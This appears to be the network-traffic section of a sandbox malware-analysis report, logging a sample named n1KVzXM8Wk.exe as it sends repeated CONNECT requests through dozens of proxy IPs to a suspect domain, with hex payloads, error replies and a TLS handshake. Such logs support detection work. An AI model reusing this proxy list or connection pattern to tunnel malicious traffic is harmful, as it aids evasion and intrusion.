                                                                                                      Feb 23, 2024 09:45:23.827716112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.834507942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.835011959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.944168091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1041192.168.2.45115485.62.218.25031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.851378918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.071803093 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/3.5.28
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 1002
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from ah_test
                                                                                                      Via: 1.1 ah_test (squid/3.5.28)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 32 33 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64
                                                                                                      Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Fri, 23 Feb 2024 08:45:23 GMT</p></d


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1042192.168.2.45272451.15.142.4163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.887001991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.974951029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.975322008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084302902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1043192.168.2.4529688.213.128.6116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.893513918 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1044192.168.2.45300334.120.231.30806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.906611919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.095060110 CET462INHTTP/1.1 405 Method Not Allowed
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 317
                                                                                                      Connection: close
                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 3c 63 6f 64 65 3e 43 4f 4e 4e 45 43 54 3c 2f 63 6f 64 65 3e 20 69 73 20 69 6e 61 70 70 72 6f 70 72 69 61 74 65 20 66 6f 72 20 74 68 65 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 3c 2f 63 6f 64 65 3e 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>405 Method Not Allowed</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Method Not Allowed</h1><h2>The request method <code>CONNECT</code> is inappropriate for the URL <code>/</code>.</h2><h2></h2></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1045192.168.2.452988195.90.216.7510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.919905901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1046192.168.2.451429104.248.158.78617256812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.925992966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.975100994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.975341082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084320068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.084249020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1047192.168.2.452915117.160.250.13088996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.930236101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.546873093 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1048192.168.2.452986195.88.240.162806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.937244892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1049192.168.2.45297843.133.80.236156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.938508987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1050192.168.2.45160066.228.37.252484876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.963273048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.975119114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.975341082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084320068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1051192.168.2.45155692.204.135.37229426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.972712040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.975105047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.975343943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084317923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1052192.168.2.453013138.197.208.9380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.982716084 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:24.137459040 CET149INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: //heygirlisheeverythingyouwantedinaman.com:443/
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1053192.168.2.45300518.228.198.164806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.990922928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.192584991 CET154INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.3.6-13ubuntu3.6
                                                                                                      Server: aserve
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:24.249916077 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 23 3e 0d 4b c8 5e 84 a0 3d 5d 54 07 11 86 c9 6f f1 f5 ff 69 c3 c4 cb 4a 62 d4 61 b3 fa 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[#>K^=]ToiJba*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:24.455106020 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 90 f9 d9 bd 59 89 93 2b 9c 9b 53 9c 70 31 4a f6 75 9c b2 fa e0 30 b8 e1 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                                      Data Ascii: =9Y+Sp1Ju0DOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223084423Z260222084423Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                                      Feb 23, 2024 09:45:24.467608929 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 8f b9 c2 22 64 20 69 76 a1 dd a0 81 0b af 97 19 ff 95 53 a3 a5 ea 75 ea 4c b9 99 44 7a e3 cb 3a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 69 af 08 9c 33 f7 55 f5 6e 49 61 52 c4 3d 37 d7 7b 5e 01 a5 f8
                                                                                                      Data Ascii: %! "d ivSuLDz:(i3UnIaR=7{^;T%$w-
                                                                                                      Feb 23, 2024 09:45:24.668086052 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 a2 15 62 18 c7 d0 83 11 3a 85 41 5c 25 bf b2 70 69 ce 75 23 22 c4 7b 35 13 e2 61 37 91 fb b0 29 c8 08 8f fd a3 15 1e 84
                                                                                                      Data Ascii: (b:A\%piu#"{5a7)


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1054192.168.2.45282851.222.241.8554526812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.991034985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1055192.168.2.452778178.33.163.156241566812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.000287056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129466057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.240847111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1056192.168.2.452780115.74.153.410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.025168896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1057192.168.2.452689218.75.102.19880006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.027442932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1058192.168.2.451621143.110.144.70179696812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.027798891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178164959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.178519964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.272353888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1059192.168.2.451713178.79.165.16421246812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.028018951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178177118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1060192.168.2.452760176.113.157.149374176812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.028140068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1061192.168.2.45277354.38.176.200366936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.034881115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1062192.168.2.451589141.94.174.6458776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.034888029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1063192.168.2.452985103.212.95.253413636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.044011116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1064192.168.2.451476162.214.227.68573376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.044928074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178278923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.178548098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.272376060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
